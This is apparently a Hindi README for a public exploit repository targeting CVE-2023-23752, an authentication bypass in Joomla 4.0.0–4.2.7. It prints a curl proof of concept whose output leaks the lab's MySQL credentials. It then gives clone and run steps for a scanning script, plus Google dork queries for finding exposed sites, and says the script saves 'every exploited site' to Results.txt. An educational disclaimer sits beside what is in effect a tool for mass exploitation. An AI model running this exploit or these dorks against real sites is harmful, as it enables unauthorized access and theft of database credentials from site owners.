
CVE-2023-23752 के लिए शोषण (4.0.0 <= Joomla <= 4.2.7).
CVE-2023-23752 (4.0.0 <= Joomla <= 4.2.7) के लिए शोषण।
जैसा कि चर्चा की गई, CVE-2023-23752 एक प्रमाणीकरण बायपास है जिसके परिणामस्वरूप जानकारी लीक होती है। अधिकांश सार्वजनिक शोषण बायपास का उपयोग करके सिस्टम के कॉन्फ़िगरेशन को लीक करते हैं, जिसमें Joomla! MySQL डेटाबेस क्रेडेंशियल स्पष्ट पाठ में शामिल होते हैं। निम्नलिखित लीक को प्रदर्शित करता है:
$ curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
* Trying 10.9.49.205:80...
* TCP_NODELAY set
* Connected to 10.9.49.205 (10.9.49.205) port 80 (#0)
> GET /api/index.php/v1/config/application?public=true HTTP/1.1
> Host: 10.9.49.205
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 20 Mar 2023 15:14:05 GMT
< Server: Apache/2.4.41 (Ubuntu)
< x-frame-options: SAMEORIGIN
< referrer-policy: strict-origin-when-cross-origin
< cross-origin-opener-policy: same-origin
< X-Powered-By: JoomlaAPI/1.0
< Expires: Wed, 17 Aug 2005 00:00:00 GMT
< Last-Modified: Mon, 20 Mar 2023 15:14:05 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Content-Length: 1983
< Content-Type: application/vnd.api+json; charset=utf-8
<
{"links":{"self":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true","next":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http:\/\/10.9.49.205\/api\/index.php\/v1\/config\/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"This site is down for maintenance.<br>Please check back again soon.","id":224}},{"type":"application","id":"224","attributes":{"display_offline_message":1,"id":224}},{"type":"application","id":"224","attributes":{"offline_image":"","id":224}},{"type":"application","id":"224","attributes":{"sitename":"vulncheck","id":224}},{"type":"application","id":"224","attributes":{"editor":"tinymce","id":224}},{"type":"application","id":"224","attributes":{"captcha":"0","id":224}},{"type":"application","id":"224","attributes":{"list_limit":20,"i* Connection #0 to host 10.9.49.205 left intact
d":224}},{"type":"application","id":"224","attributes":{"access":1,"id":224}},{"type":"application","id":"224","attributes":{"debug":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang":false,"id":224}},{"type":"application","id":"224","attributes":{"debug_lang_const":true,"id":224}},{"type":"application","id":"224","attributes":{"dbtype":"mysqli","id":224}},{"type":"application","id":"224","attributes":{"host":"localhost","id":224}},{"type":"application","id":"224","attributes":{"user":"root","id":224}},{"type":"application","id":"224","attributes":{"password":"labpass1","id":224}},{"type":"application","id":"224","attributes":{"db":"joomla_db","id":224}},{"type":"application","id":"224","attributes":{"dbprefix":"xj3n0_","id":224}},{"type":"application","id":"224","attributes":{"dbencryption":0,"id":224}},{"type":"application","id":"224","attributes":{"dbsslverifyservercert":false,"id":224}}],"meta":{"total-pages":4}}
उपरोक्त प्रूफ ऑफ कॉन्सेप्ट में, सर्वर root:labpass1 क्रेडेंशियल के साथ प्रतिक्रिया करता है, जो हमारे परीक्षण Joomla! MySQL खाते के क्रेडेंशियल हैं। लेकिन यह जानना महत्वपूर्ण है कि हमारा परीक्षण MySQL सर्वर 127.0.0.1 से बंधा हुआ था, इसलिए दूरस्थ हमलावर सर्वर तक नहीं पहुँच सकता, जिससे क्रेडेंशियल ज्यादातर बेकार हो जाते हैं। MySQL को localhost से बांधना सबसे सामान्य कॉन्फ़िगरेशन होना चाहिए, जो इस क्रेडेंशियल लीक को गंभीर रूप से सीमित करता है।
यह शोषण और प्रूफ ऑफ कॉन्सेप्ट (PoC) पूरी तरह से शैक्षिक और सूचनात्मक उद्देश्यों के लिए प्रस्तुत किया गया है। इसे साझा करने के पीछे का इरादा नियंत्रित वातावरण में संभावित कमजोरियों को प्रदर्शित करना है। लक्ष्य साइबर सुरक्षा अवधारणाओं की समझ को बढ़ावा देना और जिम्मेदार प्रकटीकरण को प्रोत्साहित करना है।
इस शोषण और PoC तक पहुँचने और इसका उपयोग करने से, आप स्वीकार करते हैं कि आप अपने कार्यों के लिए पूरी तरह से जिम्मेदार हैं और इस जानकारी का उपयोग लागू कानूनों और विनियमों के अनुपालन में करने के लिए सहमत हैं। लेखक शिक्षा और जिम्मेदार प्रकटीकरण के अलावा किसी भी उद्देश्य के लिए इस PoC के उपयोग से उत्पन्न किसी भी दुरुपयोग या परिणामों के लिए कोई दायित्व नहीं मानता है।
requests, colorama, urllib3, fake_useragent, aio-httpरिपॉजिटरी क्लोन करें:
git clone https://github.com/Pushkarup/CVE-2023-23752.git
cd CVE-2023-23752
आवश्यक Python पैकेज स्थापित करें:
pip install -r requirements.txt
.txt एक्सटेंशन के साथ सहेजें।inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" /api/index.php/v1/config/application?public=true, filetype:php inurl:/api/index.php/v1/config/application?public=true, intitle:"Index of" AND intext:"config" AND intext:"application" AND intext:"public=true"स्क्रिप्ट चलाएँ:
python joomla.py
स्क्रिप्ट को अपना कोर्स चलने दें और निर्देशों का पालन करें।
शोषित की गई प्रत्येक साइट Results.txt में संग्रहीत हो जाएगी।
योगदान का स्वागत है! यदि आपको कोई समस्या मिलती है या सुधार हैं, तो बेझिझक पुल अनुरोध खोलें या कोई समस्या बनाएँ।
यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है।